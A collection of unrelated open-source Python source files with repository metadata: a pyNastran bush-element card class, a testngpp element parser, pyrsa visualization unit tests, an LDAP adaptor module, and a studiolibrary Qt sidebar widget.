self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid)
self.cid_ref = self.cid
def uncross_reference(self):
self.ga = self.Ga()
self.gb = self.Gb()
self.cid = self.Cid()
self.pid = self.Pid()
del self.ga_ref, self.gb_ref, self.cid_ref, self.pid_ref
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
pid = self.Pid()
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types) or gb is None, 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types) or cid is None, 'cid=%r' % cid
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
#elif self.ga is None:
#return None
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types):
return self.gb
elif self.gb is None:
return None
return self.gb_ref.nid
@property
def nodes(self):
return [self.ga, self.gb]
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def raw_fields(self):
list_fields = ['CBUSH1D', self.eid, self.Pid(), self.Ga(), self.Gb(),
self.Cid()]
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
class CBUSH2D(BushElement):
"""
2-D Linear-Nonlinear Connection
Defines the connectivity of a two-dimensional Linear-Nonlinear element.
"""
type = 'CBUSH2D'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 5:'cid', 6:'plane', 7:'sptid',
}
def __init__(self, eid, pid, ga, gb, cid, plane, sptid, comment=''):
BushElement.__init__(self)
if comment:
self.comment = comment
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.cid = cid
self.plane = plane
self.sptid = sptid
if self.plane not in ['XY', 'YZ', 'ZX']:
msg = ("plane not in required list, plane=|%s|\n"
"expected planes = ['XY','YZ','ZX']" % self.plane)
raise RuntimeError(msg)
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid')
ga = integer(card, 3, 'ga')
gb = integer(card, 4, 'gb')
cid = integer_or_blank(card, 5, 'cid', 0)
plane = string_or_blank(card, 6, 'plane', 'XY')
sptid = integer_or_blank(card, 7, 'sptid')
assert len(card) <= 8, 'len(CBUSH2D card) = %i\ncard=%s' % (len(card), card)
return CBUSH2D(eid, pid, ga, gb, cid, plane, sptid, comment=comment)
#@classmethod
#def add_op2_data(cls, data, comment=''):
#eid = data[0]
#pid = data[1]
#ga = data[2]
#gb = data[3]
#raise NotImplementedError(data)
#return CBUSH2D(eid, pid, ga, gb, cid, plane, sptid, comment=comment)
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
pid = self.Pid()
plane = self.plane
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types), 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types), 'cid=%r' % cid
assert self.plane in ['XY', 'YZ', 'ZX'], 'plane=%r' % plane
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types):
return self.gb
return self.gb_ref.nid
@property
def nodes(self):
return [self.ga, self.gb]
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH2D eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
self.pid = model.Property(self.pid)
self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid, msg=msg)
self.cid_ref = self.cid
if self.sptid is not None:
pass
def uncross_reference(self):
self.ga = self.Ga()
self.gb = self.Gb()
self.cid = self.Cid()
self.pid = self.Pid()
del self.ga_ref, self.gb_ref, self.cid_ref, self.pid_ref
def raw_fields(self):
list_fields = ['CBUSH2D', self.eid, self.Pid(), self.Ga(), self.Gb(),
self.Cid(), self.plane, self.sptid]
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
|
saullocastro/pyNastran
|
pyNastran/bdf/cards/elements/bush.py
|
Python
|
lgpl-3.0
| 15,256
|
#!/usr/bin/python
from PreprocessScope import PreprocessScope
from PreprocessScopeParser import PreprocessScopeParser
from Useless import Useless
from Phase1Result import *
from Message import *
class ElemParser:
#######################################################
def __init__(self, file, parser, container):
self.file = file
self.parser = parser # for fixture
self.elem_parser = None
self.sub_scopes = []
self.done = None
self.last_line = None
self.container = container
#######################################################
def __handle_tag(self, line):
if isinstance(line, Tag):
self.parser.handle_tag(line)
return None
return True
#######################################################
def __handle_scope(self, line):
if isinstance(line, PreprocessScope):
if self.parser.verify_scope(line):
self.sub_scopes.append(line)
return None
return True
#######################################################
def __handle_sub_elem(self, line):
elem_parser = \
self.parser.get_elem_parser( \
self.container, \
self.file, \
line);
if elem_parser == None:
return True
if not self.__handle_elem_result(elem_parser.is_done()):
self.elem_parser = ElemParser(self.file, elem_parser, elem_parser.get_container())
return None
#######################################################
def __parse_normal_line(self, line):
return self.parser.parse_line(line)
#######################################################
def __parse_by_myself(self, line):
return self.__handle_tag(line) and \
self.__handle_scope(line) and \
self.__handle_sub_elem(line) and \
self.__parse_normal_line(line)
#######################################################
def __handle_elem_result(self, elem):
if elem:
if not isinstance(elem, Useless):
self.container.add_elem(elem)
self.elem_parser = None
return True
return None
#######################################################
def __parse_elem(self, line):
self.__handle_elem_result(self.elem_parser.parse_line(line))
return None
#######################################################
def __parse_scope(self, scope):
return PreprocessScopeParser(self.file, scope, self.parser, \
self.__class__, self.container.get_scope()).parse()
#######################################################
def __handle_sub_scopes(self):
for scope in self.sub_scopes:
self.container.add_sub_scope(self.__parse_scope(scope))
self.sub_scopes = []
#######################################################
def parse_line(self, line):
if self.done:
fatal(self.file, line, "testngpp generator internal error, please report bug to arthur.ii.yuan@gmail.com")
self.last_line = line
if self.elem_parser:
return self.__parse_elem(line)
self.done = self.__parse_by_myself(line)
if self.done and self.parser.should_parse_sub_scopes():
self.__handle_sub_scopes()
return self.done
#######################################################
def incompleted_elem_def(self):
return self.elem_parser != None
#######################################################
def get_unhandled_sub_scopes(self):
return self.sub_scopes
##########################################################
|
aprovy/test-ng-pp
|
scripts/testngppgen/ElemParser.py
|
Python
|
lgpl-3.0
| 3,611
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
test_data
Test for visualization class
@author: baihan
"""
import unittest
import numpy as np
import pyrsa.vis as rsv
import pyrsa.rdm as rsr
from scipy.spatial.distance import pdist
class TestVIS(unittest.TestCase):
def test_vis_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms)
self.assertEqual(mds_emb.shape, (8, 5, 2))
def test_vis_3d_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3)
self.assertEqual(mds_emb.shape, (8, 5, 3))
def test_vis_weighted_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
wes = np.random.random((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, weight=wes)
self.assertEqual(mds_emb.shape, (8, 5, 2))
def test_vis_3d_weighted_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
wes = np.random.random((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3, weight=wes)
self.assertEqual(mds_emb.shape[0], 8)
self.assertEqual(mds_emb.shape[1], 5)
self.assertEqual(mds_emb.shape[2], 3)
def test_vis_weighted_mds_output_behaves_like_mds(self):
dis = np.random.rand(8, 10)
wes = np.ones((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms)
wmds_emb = rsv.mds(rdms, weight=wes)
np.testing.assert_allclose(pdist(mds_emb[0]), pdist(wmds_emb[0]),
atol=3e-1)
def test_vis_3d_weighted_mds_output_behaves_like_mds(self):
dis = np.random.rand(8, 10)
wes = np.ones((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3)
wmds_emb = rsv.mds(rdms, dim=3, weight=wes)
np.testing.assert_allclose(pdist(mds_emb[0]), pdist(wmds_emb[0]),
atol=3e-1)
class Test_Icon(unittest.TestCase):
def test_Icon_no_error(self):
import PIL
from pyrsa.vis import Icon
import matplotlib.pyplot as plt
test_im = PIL.Image.fromarray(255 * np.random.rand(50, 100))
ic5 = Icon(image=test_im, col='red', border_width=5,
make_square=True, resolution=20)
ic5.plot(0.8, 0.8)
ic = Icon(image=255 * np.random.rand(50, 100), cmap='Blues')
ax = plt.axes(label='test')
ic.plot(0.5, 0.5, ax=ax)
ic2 = Icon(image=test_im, col='black', border_width=15,
string='test')
ic2.plot(0.8, 0.2, ax=ax, size=0.4)
ic2.x_tick_label(0.5, 0.15, offset=7)
ic2.y_tick_label(0.5, 0.25, offset=7)
ic3 = Icon(image=test_im, col='red', border_width=5,
make_square=True)
ic3.plot(0.2, 0.2, size=0.4)
ic4 = Icon(string='test')
ic4.plot(0.2, 0.8, size=0.4)
ic4.x_tick_label(0.75, 0.15, offset=7)
ic4.y_tick_label(0.75, 0.25, offset=17)
self.assertEqual(ic2.image, test_im)
if __name__ == '__main__':
unittest.main()
|
ilogue/pyrsa
|
tests/test_vis.py
|
Python
|
lgpl-3.0
| 4,262
|
""" the ldapadaptor module handles low-level LDAP operations """
from functools import wraps
import operator
import re
import logging
LOG = logging.getLogger(__name__)
import ldap
import ldap.filter
import ldap.dn
from ldap.controls import SimplePagedResultsControl as PagedCtrl
from plow.errors import LdapAdaptorError
try:
ldap.CONTROL_PAGEDRESULTS
make_page_control = PagedCtrl
get_page_control = operator.attrgetter("size", "cookie")
except AttributeError:
# seems like we are in < 2.4 version
def PCtrlAdapter(criticality, size, cookie):
return PagedCtrl(PagedCtrl.controlType, criticality, (size, cookie))
make_page_control = PCtrlAdapter
get_page_control = operator.attrgetter("controlValue")
RANGED_ATTR = re.compile("(?P<name>.*);range=(?P<start>\d+)-(?P<end>\*|\d+)$")
def get_new_ranges(attrs):
""" Returns a list of attributes that need to be fetched to complete
the attribute dict `attrs`. Those are all the attributes in the form
attrname;range=start-end
where end isn't *.
The new list will be the following ranges in the format
attrname;range=newstart-*
"""
extra = [
m.groupdict()
for m in
(RANGED_ATTR.match(attrname) for attrname in attrs)
if m is not None
]
return [
"{name};range={start}-*".format(
name = d["name"],
start = int(d["end"]) + 1,
)
for d in extra
if d["end"] != "*"
]
def check_connected(f):
""" Utility decorator to retry connection on ldap.SERVER_DOWN """
@wraps(f)
def _newcall_(self, *args, **kwargs):
if not self.is_connected:
LOG.debug("check_connected -> not connected")
self.initialize(self._server_url)
self.bind(self._binduser, self._bindpw)
try:
return f(self, *args, **kwargs)
except ldap.SERVER_DOWN, down:
LOG.debug("check_connected -> server down")
#Make a reconnect attempt
self.is_connected = False
self.initialize(self._server_url)
self.bind(self._binduser, self._bindpw)
return f(self, *args, **kwargs)
return _newcall_
class LdapAdaptor(object):
def __init__ (self,
server_uri,
base_dn,
bind_user=None,
bind_password=None,
certificate_validation=False,
referrals=None,
case_insensitive_dn=False,
dry_run=False,
require_delold=False,
):
"""
Creates the instance, initializing a connection and binding to the LDAP
server.
"""
self._connected = False
self._bound = False
self._ldap = None
self._server_url = server_uri
self._binduser, self._bindpw = bind_user, bind_password
self._base_dn = base_dn
self._cert_validation = certificate_validation
self._case_insensitive_dn = case_insensitive_dn
self._referrals = referrals
self.require_delold = require_delold
# FIXME : Defer initialization until connection is needed
self.initialize (self._server_url)
self.bind(self._binduser, self._bindpw)
self._dry_run = dry_run
def is_dry_run(self):
if hasattr(self._dry_run, "__call__"):
return self._dry_run()
else:
return self._dry_run
def _dry_run_msg(self):
if self.is_dry_run():
return "DRY-RUN "
else:
return ""
def __del__(self):
if self._ldap:
self._ldap.unbind()
def __str__(self):
return "<LdapAdaptor: {0}>".format(self._server_url)
def __repr__(self):
return str(self)
def initialize (self, server, p_version=ldap.VERSION3):
"""
Initializes the LDAP system and returns an LDAPObject.
Uses the initialize() function, which takes a simple LDAP URL (in the
format protocol://host:port) as a parameter. A safe connection can be
done using an ldaps:// protocol instead of ldap://. Standard
ldap.VERSION is 3, but can be changed passing the desired version
as a parameter.
"""
LOG.info("Initializing connection with server %s ..." % server)
try:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
if self._referrals is None:
ldap.set_option(ldap.OPT_REFERRALS, ldap.DEREF_NEVER)
else:
ldap.set_option(ldap.OPT_REFERRALS, self._referrals)
#ldap.initialize will only raise an exception with a bad formed URL
self._ldap = ldap.initialize (server)
self.is_connected = True
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
self._ldap.protocol_version = p_version
# FIXME: the client of the interface doesn't care to bind and unbind :
# should be managed internaly If the client code tries to do a
# client.add() call without a client.bind(), it will fail and it's bad.
def bind (self, user_dn, user_passwd):
"""
Binds to the LDAP directory.
Once we have an LDAPObject instance, we need to bind to the LDAP server. The
python-ldap API supports both simple and SASL binding methods.
"""
LOG.info("Binding to the server with user %s ..." % user_dn)
if not self.is_connected:
self.initialize(self._server_url)
try:
self._ldap.simple_bind_s (user_dn, user_passwd)
except ldap.LDAPError, e:
self.is_connected = False
LOG.error("Caught ldap error: %s", str(e))
raise
def unbind (self):
"""
Unbinds and closes the connection to the LDAP server.
"""
LOG.info("Unbinding from the server")
if not self.is_connected:
LOG.debug("Not Connected")
return
try:
self._ldap.unbind()
self._ldap = None
except ldap.SERVER_DOWN, e:
LOG.warn("Caught SERVER_DOWN, ignoring")
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
finally:
# we can't rely on this being connected after an error
# or a successful unbind
self.is_connected = False
@check_connected
def add (self, dn, add_record):
"""
Perform an add operation.
add_record must be a list of tuples, where the first element of the tuple
must be an attribute and the second element of the tuple must be the value
of the attribute, which can be a list or a string.
Hint: you may use ldap.modlist addModList() function to convert a data
structure in the format of a dictionnary in the format used here by
add_record.
"""
LOG.debug("%(dry_run_msg)sAdding %(dn)s: %(data)s..." %
{"dry_run_msg": self._dry_run_msg(),
"dn": dn, "data": repr(add_record)})
if self.is_dry_run():
return
try:
result_type, result_data = self._ldap.add_s(dn, add_record)
if result_type != ldap.RES_ADD:
raise LdapAdaptorError(
"add: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.ALREADY_EXISTS, e:
LOG.error("Record already exists")
raise
@check_connected
def delete (self, dn):
"""
Delete an ldap entry.
"""
LOG.debug("{dryrunmsg}Deleting {dn}..."
.format(dryrunmsg = self._dry_run_msg(), dn = dn))
if self.is_dry_run():
return
try:
res = self._ldap.delete_s (dn)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_DELETE:
raise LdapAdaptorError(
"delete : unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def modify (self, dn, mod_attrs):
""" Modify ldap attributes
mod_attrs is a list of modification three-tuples
(modification type, attribute name, value)
The modification type can be one of the followings:
- ldap.MOD_ADD : add the value to an attribute, if the schema allows
- ldap.MOD_DELETE : remove the value from the attribute, if it exists
- ldap.MOD_REPLACE : the value replaces old values of the attribute
- ldap.MOD_INCREMENT (code 3).
Hint: ldap.modlist's modifyModList() can be used to convert a data
strucutre in the format of a dictionnary in the format used here by
mod_attrs.
"""
LOG.debug("%(dry_run_msg)sModifying %(dn)s: %(attrs)s" %
{"dry_run_msg": self._dry_run_msg(),
"dn": dn, "attrs": str(mod_attrs)})
if self.is_dry_run():
return
try:
res = self._ldap.modify_s (dn, mod_attrs)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_MODIFY:
raise LdapAdaptorError(
"modify: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def rename (self, dn, newrdn, newsuperior=None, delold=1):
"""
Perform a modify RDN operation.
"""
LOG.debug(
"%(dry_run)sModifying dn %(dn)s to %(newrdn)s%(newsuperior)s..." %
{"dry_run": self._dry_run_msg(),
"dn": dn, "newrdn": newrdn,
"newsuperior": newsuperior and "," + newsuperior or "" })
if self.is_dry_run():
return [True, None]
try:
res = self._ldap.rename_s(dn,
newrdn,
newsuperior,
delold)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_MODRDN:
raise LdapAdaptorError(
"rename: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def search (self,
base_dn=None,
scope=ldap.SCOPE_SUBTREE,
filterstr='(objectClass=*)',
attrs=None,
page_size=1000):
"""
search([base_dn [, scope [, filterstr [, attrs [, page_size]]]]])
Search for entries
Scope can be one of the followings:
- SCOPE_BASE (to search the object itself);
- SCOPE_ONELEVEL (to search the object's immediate children);
- SCOPE_SUBTREE (to search the object and all its descendants).
Return list of results
"""
base_dn = base_dn or self._base_dn
LOG.debug(
"Searching for %(filter)s (%(attrs)s) on %(dn)s ..." %
{"filter": filterstr, "attrs": attrs, "dn": base_dn})
all_res = []
page_cookie = ''
while True:
# Use?
#filterstr = ldap.filter.escape_filter_chars(filterstr)
paging_ctrl = make_page_control(False, page_size, page_cookie)
query_id = self._ldap.search_ext(base_dn,
scope,
filterstr,
attrs,
serverctrls=[paging_ctrl])
x, res, y, ctrls = self._ldap.result3(query_id)
for dn, obj_attrs in res:
if dn is None:
continue
# Pesky attributes might be ranges, we need to see about that
new_ranges = get_new_ranges(obj_attrs)
while new_ranges:
new_res = self._ldap.search_s(dn,
ldap.SCOPE_BASE,
attrlist=new_ranges)
if len(new_res) != 1 or new_res[0][0] is None:
LOG.warn("get extra attr failed for {0}".format(dn))
break
new_attrs = new_res[0][1]
obj_attrs.update(new_attrs)
new_ranges = get_new_ranges(new_attrs)
all_res += res
# extract cookie if supplied by server
page_cookie = ''
for ext in ctrls:
if isinstance(ext, PagedCtrl):
x, page_cookie = get_page_control(ext)
if not page_cookie:
break #Paging not supported or end of paging
return all_res
@check_connected
def compare (self, dn, attr_name, attr_value):
"""
Return True if dn has attr_name with attr_value or False otherwise.
Verify in the directory server if the given DN has an attribute with
the given attribute name, and the given attribute value.
"""
LOG.debug(
"Verifying if %(dn)s has attribute %(attr_name)s=%(attr_val)s ..."
% {"dn": dn, "attr_name": attr_name, "attr_val": attr_value}
)
try:
return self._ldap.compare_s (dn, attr_name, attr_value)
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def passwd(self, dn, newpass, oldpass=None):
try:
self._ldap.passwd_s(dn, oldpass, newpass)
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
def get_error (self, e):
"""Try to identify error description from exception and return it."""
raise DeprecationWarning("get_error is deprecated")
def _set_verbose(self, v):
pass
def _get_verbose(self):
return True
verbose = property(fset=_set_verbose, fget=_get_verbose)
def _get_base_dn(self):
return self._base_dn
base_dn = property(fget=_get_base_dn)
def _get_connected(self):
return self._connected
def _set_connected(self, value):
self._connected = value
is_connected = property(fget=_get_connected, fset=_set_connected)
@property
def is_case_insensitive(self):
return self._case_insensitive_dn
def normalize_value(self, val):
if self.is_case_insensitive:
return val.lower()
else:
return val
def normalize_dn(self, dn):
attr = lambda name:name.lower()
handle_parts = lambda l: [
(attr(a), self.normalize_value(v), t) for a, v, t in l
]
return ldap.dn.dn2str(
handle_parts(part) for part in ldap.dn.str2dn(dn)
)
def compare_dn(self, dn, other):
# Normalize dn's to standard
return self.normalize_dn(dn) == self.normalize_dn(other)
|
veloutin/plow
|
plow/ldapadaptor.py
|
Python
|
lgpl-3.0
| 15,616
|
# Copyright 2020 by Kurt Rathjen. All Rights Reserved.
#
# This library is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. This library is distributed in the
# hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
import time
import logging
import functools
import collections
from studiovendor import six
from studiovendor.Qt import QtGui
from studiovendor.Qt import QtCore
from studiovendor.Qt import QtWidgets
import studioqt
import studiolibrary
import studiolibrary.widgets
from .sidebarwidgetitem import SidebarWidgetItem
__all__ = ["SidebarWidget"]
logger = logging.getLogger(__name__)
DEFAULT_SEPARATOR = "/"
def pathsToDict(paths, root="", separator=None):
"""
Return the given paths as a nested dict.
Example:
paths = ["/fruit/apple", "/fruit/orange"]
print pathsToDict(paths)
# Result: {"fruit" : {"apple":{}}, {"orange":{}}}
:type paths: list[str]
:type root: str
:type separator: str or None
:rtype: dict
"""
separator = separator or DEFAULT_SEPARATOR
results = collections.OrderedDict()
paths = studiolibrary.normPaths(paths)
for path in paths:
p = results
# This is to add support for grouping by the given root path.
if root and root in path:
path = path.replace(root, "")
p = p.setdefault(root, collections.OrderedDict())
keys = path.split(separator)[0:]
for key in keys:
if key:
p = p.setdefault(key, collections.OrderedDict())
return results
def findRoot(paths, separator=None):
"""
Find the common path for the given paths.
Example:
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana'
]
print(findRoot(paths))
# '/fruit'
:type paths: list[str]
:type separator: str
:rtype: str
"""
if paths:
path = list(paths)[0] # Only need one from the list to verify the common path.
else:
path = ""
result = None
separator = separator or DEFAULT_SEPARATOR
tokens = path.split(separator)
for i, token in enumerate(tokens):
root = separator.join(tokens[:i+1])
match = True
for path in paths:
if not path.startswith(root + separator):
match = False
break
if not match:
break
result = root
return result
class SidebarWidget(QtWidgets.QWidget):
itemDropped = QtCore.Signal(object)
itemRenamed = QtCore.Signal(str, str)
itemSelectionChanged = QtCore.Signal()
settingsMenuRequested = QtCore.Signal(object)
def __init__(self, *args):
super(SidebarWidget, self).__init__(*args)
self._dataset = None
self._lineEdit = None
self._previousFilterText = ""
layout = QtWidgets.QVBoxLayout(self)
layout.setSpacing(0)
layout.setContentsMargins(0,0,0,0)
self.setLayout(layout)
self._treeWidget = TreeWidget(self)
self._treeWidget.itemDropped = self.itemDropped
self._treeWidget.itemRenamed = self.itemRenamed
self._treeWidget.itemSelectionChanged.connect(self._itemSelectionChanged)
self._titleWidget = self.createTitleWidget()
self._titleWidget.ui.menuButton.clicked.connect(self.showSettingsMenu)
self._titleWidget.ui.titleButton.clicked.connect(self.clearSelection)
self.layout().addWidget(self._titleWidget)
self.layout().addWidget(self._treeWidget)
self._treeWidget.installEventFilter(self)
def _itemSelectionChanged(self, *args):
self.itemSelectionChanged.emit()
def eventFilter(self, obj, event):
"""Using an event filter to show the search widget on key press."""
if event.type() == QtCore.QEvent.KeyPress:
self._keyPressEvent(event)
return super(SidebarWidget, self).eventFilter(obj, event)
def _keyPressEvent(self, event):
"""
Triggered from the tree widget key press event.
:type event: QKeyEvent
"""
text = event.text().strip()
if not text.isalpha() and not text.isdigit():
return
if text and not self._titleWidget.ui.filterEdit.hasFocus():
self._titleWidget.ui.filterEdit.setText(text)
self.setFilterVisible(True)
self._previousFilterText = text
def _filterVisibleTrigger(self, visible):
"""
Triggered by the filter visible action.
:type visible: bool
"""
self.setFilterVisible(visible)
self._titleWidget.ui.filterEdit.selectAll()
def createTitleWidget(self):
"""
Create a new instance of the title bar widget.
:rtype: QtWidgets.QFrame
"""
class UI(object):
"""Proxy class for attaching ui widgets as properties."""
pass
titleWidget = QtWidgets.QFrame(self)
titleWidget.setObjectName("titleWidget")
titleWidget.ui = UI()
vlayout = QtWidgets.QVBoxLayout(self)
vlayout.setSpacing(0)
vlayout.setContentsMargins(0,0,0,0)
hlayout = QtWidgets.QHBoxLayout(self)
hlayout.setSpacing(0)
hlayout.setContentsMargins(0,0,0,0)
vlayout.addLayout(hlayout)
titleButton = QtWidgets.QPushButton(self)
titleButton.setText("Folders")
titleButton.setObjectName("titleButton")
titleWidget.ui.titleButton = titleButton
hlayout.addWidget(titleButton)
menuButton = QtWidgets.QPushButton(self)
menuButton.setText("...")
menuButton.setObjectName("menuButton")
titleWidget.ui.menuButton = menuButton
hlayout.addWidget(menuButton)
self._lineEdit = studiolibrary.widgets.LineEdit(self)
self._lineEdit.hide()
self._lineEdit.setObjectName("filterEdit")
self._lineEdit.setText(self.treeWidget().filterText())
self._lineEdit.textChanged.connect(self.searchChanged)
titleWidget.ui.filterEdit = self._lineEdit
vlayout.addWidget(self._lineEdit)
titleWidget.setLayout(vlayout)
return titleWidget
def _dataChanged(self):
pass
def setDataset(self, dataset):
"""
Set the dataset for the search widget:
:type dataset: studioqt.Dataset
"""
self._dataset = dataset
self._dataset.dataChanged.connect(self._dataChanged)
self._dataChanged()
def dataset(self):
"""
Get the dataset for the search widget.
:rtype: studioqt.Dataset
"""
return self._dataset
def search(self):
"""Run the dataset search."""
if self.dataset():
self.dataset().addQuery(self.query())
self.dataset().search()
else:
logger.info('No dataset found for the sidebar widget.')
def query(self):
"""
Get the query for the sidebar widget.
:rtype: dict
"""
filters = []
for path in self.selectedPaths():
if self.isRecursive():
suffix = "" if path.endswith("/") else "/"
filter_ = ('folder', 'startswith', path + suffix)
filters.append(filter_)
filter_ = ('folder', 'is', path)
filters.append(filter_)
uniqueName = 'sidebar_widget_' + str(id(self))
return {'name': uniqueName, 'operator': 'or', 'filters': filters}
def searchChanged(self, text):
"""
Triggered when the search filter has changed.
:type text: str
"""
self.refreshFilter()
if text:
self.setFilterVisible(True)
else:
self.treeWidget().setFocus()
self.setFilterVisible(False)
def showSettingsMenu(self):
"""Create and show a new settings menu instance."""
menu = studioqt.Menu(self)
self.settingsMenuRequested.emit(menu)
self.createSettingsMenu(menu)
point = QtGui.QCursor.pos()
point.setX(point.x() + 3)
point.setY(point.y() + 3)
action = menu.exec_(point)
menu.close()
def createSettingsMenu(self, menu):
"""
Create a new settings menu instance.
:rtype: QMenu
"""
action = menu.addAction("Show Filter")
action.setCheckable(True)
action.setChecked(self.isFilterVisible())
callback = functools.partial(self._filterVisibleTrigger, not self.isFilterVisible())
action.triggered.connect(callback)
action = menu.addAction("Show Icons")
action.setCheckable(True)
action.setChecked(self.iconsVisible())
callback = functools.partial(self.setIconsVisible, not self.iconsVisible())
action.triggered.connect(callback)
action = menu.addAction("Show Root Folder")
action.setCheckable(True)
action.setChecked(self.isRootVisible())
callback = functools.partial(self.setRootVisible, not self.isRootVisible())
action.triggered.connect(callback)
return menu
def setFilterVisible(self, visible):
"""
Set the filter widget visible
:type visible: bool
"""
self._titleWidget.ui.filterEdit.setVisible(visible)
self._titleWidget.ui.filterEdit.setFocus()
if not visible and bool(self.treeWidget().filterText()):
self.treeWidget().setFilterText("")
else:
self.refreshFilter()
def setSettings(self, settings):
"""
Set the settings for the widget.
:type settings: dict
"""
self.treeWidget().setSettings(settings)
value = settings.get("filterVisible")
if value is not None:
self.setFilterVisible(value)
value = settings.get("filterText")
if value is not None:
self.setFilterText(value)
def settings(self):
"""
Get the settings for the widget.
:rtype: dict
"""
settings = self.treeWidget().settings()
settings["filterText"] = self.filterText()
settings["filterVisible"] = self.isFilterVisible()
return settings
# --------------------------------
# convenience methods
# --------------------------------
def filterText(self):
return self.treeWidget().filterText()
def setFilterText(self, text):
self._titleWidget.ui.filterEdit.setText(text)
def refreshFilter(self):
self.treeWidget().setFilterText(self._titleWidget.ui.filterEdit.text())
def isFilterVisible(self):
return bool(self.treeWidget().filterText()) or self._titleWidget.ui.filterEdit.isVisible()
def setIconsVisible(self, visible):
self.treeWidget().setIconsVisible(visible)
def iconsVisible(self):
return self.treeWidget().iconsVisible()
def setRootVisible(self, visible):
self.treeWidget().setRootVisible(visible)
def isRootVisible(self):
return self.treeWidget().isRootVisible()
def treeWidget(self):
return self._treeWidget
def setDpi(self, dpi):
self.treeWidget().setDpi(dpi)
def setRecursive(self, enabled):
self.treeWidget().setRecursive(enabled)
def isRecursive(self):
return self.treeWidget().isRecursive()
def setData(self, *args, **kwargs):
self.treeWidget().setData(*args, **kwargs)
def setItemData(self, id, data):
self.treeWidget().setPathSettings(id, data)
def setLocked(self, locked):
self.treeWidget().setLocked(locked)
def selectedPath(self):
return self.treeWidget().selectedPath()
def selectPaths(self, paths):
self.treeWidget().selectPaths(paths)
def selectedPaths(self):
return self.treeWidget().selectedPaths()
def clearSelection(self):
self.treeWidget().clearSelection()
